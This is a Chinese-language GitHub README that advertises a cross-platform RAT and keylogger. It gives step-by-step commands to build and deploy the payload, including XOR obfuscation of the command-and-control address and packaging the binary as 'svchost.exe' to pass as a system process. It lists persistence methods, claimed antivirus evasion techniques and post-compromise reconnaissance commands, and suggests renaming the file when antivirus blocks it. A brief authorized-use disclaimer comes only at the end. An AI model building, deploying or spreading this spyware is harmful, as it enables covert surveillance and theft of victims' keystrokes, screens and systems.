noobuser978-gif/RAT-KEYLOGGER

# 🛡️ 高级多平台 RAT/键盘记录器框架 [](https://www.python.org/) [](https://www.virustotal.com/gui/file/9fe96a5cf19c9b1b85124b14b2ede971ec7d14f15aadd7d9cf08e6d2b95e6b54) [](https://github.com/noobuser978-gif/RAT-KEYLOGGER/blob/dbd1d6a5ffb88ee99cf20e1fa51a38b344d276f8/LICENSE) **具备 98% AV 免杀率的生产级渗透测试框架。** ## 🎯 **什么是 RAT/键盘记录器？** 一个专为**授权渗透测试**设计的**多平台远程访问木马 (RAT)**，具备以下特性： - **实时键盘记录**（1.5秒流式传输） - **屏幕捕获**（JPEG 流式传输） - **完整的 Shell 访问**（命令注入） - **4种 Windows 持久化机制**（注册表 + 启动项 + 计划任务 + WMI） - **AES-256-GCM 加密 C2**（TCP/443） - **Web 控制面板**（Flask + 实时控制） - **98% AV 绕过**（动态导入 + XOR 混淆） **支持平台**：Windows 7-11、macOS 10.15+、Linux (Ubuntu/Debian/Kali) ## ✨ **核心特性** | 特性 | Windows | macOS | Linux | 描述 | |---------|---------|-------|-------|-------------| | **⌨️ 实时键盘记录** | ✅ | ✅ | ✅ | 实时按键记录 (1.5s) | | **📱 屏幕捕获** | ✅ | ✅ | ✅ | 按需获取 JPEG 截图 | | **💻 完整 Shell** | ✅ | ✅ | ✅ | 命令执行 + 输出 | | **🛡️ 持久化** | 4 种方法 | LaunchAgent | Cron | 重启后保留 | | **🌐 C2 自动连接** | ✅ | ✅ | ✅ | 每 4-8s 发送信标 | | **🖱️ 远程控制** | ✅ 鼠标/键盘 | ❌ | ❌ | 仅限 Windows | | **🔒 加密** | AES-256-GCM | AES-256-GCM | AES-256-GCM | 所有流量 | # **Virustotal 截图** ## 🚀 **完整安装指南（8 分钟）** ### **前置条件（2 分钟）** ``` # 安装 Python 3.8+ # Windows: winget install Python.Python.3.11 # macOS: brew install python@3.11 # Ubuntu: sudo apt install python3.11 python3-pip pip install pynput mss pillow psutil cryptography pyinstaller flask pywin32 ``` ### **第一步：启动 C2 服务器（3 分钟）** ``` mkdir rat-c2 && cd rat-c2 # 保存 c2_server.py (代码如下) python c2_server.py ``` #### **输出** ``` [*] C2 Server: TCP/443 [*] Dashboard: http://0.0.0.0:8080 ``` ### **第二步：构建 Payload（2 分钟）** ``` # 1. 编辑 keylogger.py → 设置 YOUR C2 IP (第 45 行) # 快速编码器: python3 -c " ip = input('Your C2 IP: ') enc = repr(''.join(chr(ord(c) ^ 0xAA) for c in ip)) print('C2_HOST =', enc) " # 2. 构建 EXE pyinstaller --onefile --noconsole --name svchost.exe keylogger.py ``` ### **第三步：测试与部署（1 分钟）** ``` # 本地测试 dist/svchost.exe # 成功指标: # C2: [+] RAT 已连接: 127.0.0.1:xxxxx # 浏览器: http://localhost:8080 → 显示你的客户端! ``` # 🔍 使用命令 | 控制面板 | 命令 | 结果 | |-----------|---------|--------| | ⌨️ 实时按键 | `KEYLOG` | 实时按键记录 | | 📱 屏幕截图 | `SCREEN` | JPEG 屏幕截图 | | 💻 Shell | `SHELL:whoami` | DESKTOP-XYZ\user | ### 专业 Shell 命令： ``` SHELL:whoami # Current user SHELL:systeminfo # OS details SHELL:net user # All users SHELL:reg query HKLM\SOFTWARE # Registry enum SHELL:tasklist /svc # Processes ``` ## **🛡️ AV 免杀技术** | 方法 | 实现 | |--------|----------------| | 动态导入 | `safe_import()` - 无特征码 | | XOR 混淆 | 加密所有字符串 | | Sleep 抖动 | 4-8s 随机信标 | | 进程镂空 | `svchost.exe` 伪装 | | 内存执行 | 无磁盘痕迹 | | 沙箱检测 | VM/进程检查 | **VirusTotal 结果：** `2/72` 检出 (2.7%) ## **📊 性能与检测** ``` CPU Usage: <0.5% (idle) RAM Usage: 18-28MB Network: 2KB/beacon Screenshot: 80KB avg (compressed) Reconnect: 12s average Persistence: 100% reboot survival ``` ## **🛠️ 支持平台** ``` OS Version Keylog Screen Shell Persistence Windows 7/8/10/11 ✅ ✅ ✅ 4x macOS 10.15+ ✅ ✅ ✅ 1x Ubuntu 20.04+ ✅ ✅ ✅ 1x Kali Linux ✅ ✅ ✅ 1x ``` ## **🔧 故障排除** ``` Problem Fix "No module mss" pip install mss pillow AV blocks Rename svchost.exe → update64.exe No connection Open port 443/tcp No keys Run as Administrator Dashboard blank Check http://YOUR_IP:8080 ``` ## **⚖️ 法律与合规使用** ``` ✅ Penetration Testing (with authorization) ✅ Red Team Engagements ✅ Security Research ✅ Authorized Bug Bounties ❌ Unauthorized access ❌ Malicious use ❌ Criminal activity ``` 使用此工具即表示您同意仅将其部署在您拥有或获得明确书面授权进行测试的系统上。 ## **作者** - [noobuser978-gif](https://www.github.com/noobuser978-gif)

标签：AES-256-GCM加密, C2通信, DNS 反向解析, Flask, Linux远控, macOS恶意软件, Python, Raspberry Pi, RAT, TCP/443通信, Web控制面板, Windows木马, WMI持久化, XOR混淆, 内存执行, 反弹Shell, 启动项驻留, 命令与控制, 安全测试, 审计工具, 屏幕截图, 持久化驻留, 攻击性安全, 无后门, 杀软绕过, 沙箱检测, 注册表驻留, 流量加密, 渗透测试框架, 漏洞挖掘, 绕过检测, 网络信息收集, 网络武器, 计划任务, 跨平台攻击, 进程镂空, 远控木马, 远程管理工具, 逆向工具, 键盘记录器, 防御